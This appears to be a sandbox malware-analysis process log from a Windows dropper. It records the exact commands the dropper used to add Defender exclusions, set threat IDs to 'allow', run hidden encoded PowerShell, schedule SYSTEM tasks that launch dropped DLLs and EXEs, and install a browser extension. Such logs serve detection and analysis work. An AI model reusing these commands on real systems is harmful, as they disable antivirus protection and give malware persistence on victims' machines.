C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gujLJpmjG" /SC once /ST 00:45:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gujLJpmjG"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gujLJpmjG"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:57:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\nqhFWmq.exe\" y7 /MGsCdidxY 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 10682⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\nqhFWmq.exeC:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\nqhFWmq.exe y7 /MGsCdidxY 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\WlzzPF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\DXMumWU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\OWlKdvP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\WZAEPle.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\dOdgGqZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\HeBupxH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 01:38:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\QOeCgusg\kYYRXAq.dll\",#1 /tAVdidHBHi 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QdCYtDviHOrgqJLgZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CWXZI1" /SC once /ST 01:38:05 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CWXZI1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CWXZI1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 25642⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3900 -ip 39001⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x474 0x4241⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\QOeCgusg\kYYRXAq.dll",#1 /tAVdidHBHi 3851181⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\QOeCgusg\kYYRXAq.dll",#1 /tAVdidHBHi 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc196846f8,0x7ffc19684708,0x7ffc196847182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3563750138951915474,7796843730543226217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵
-
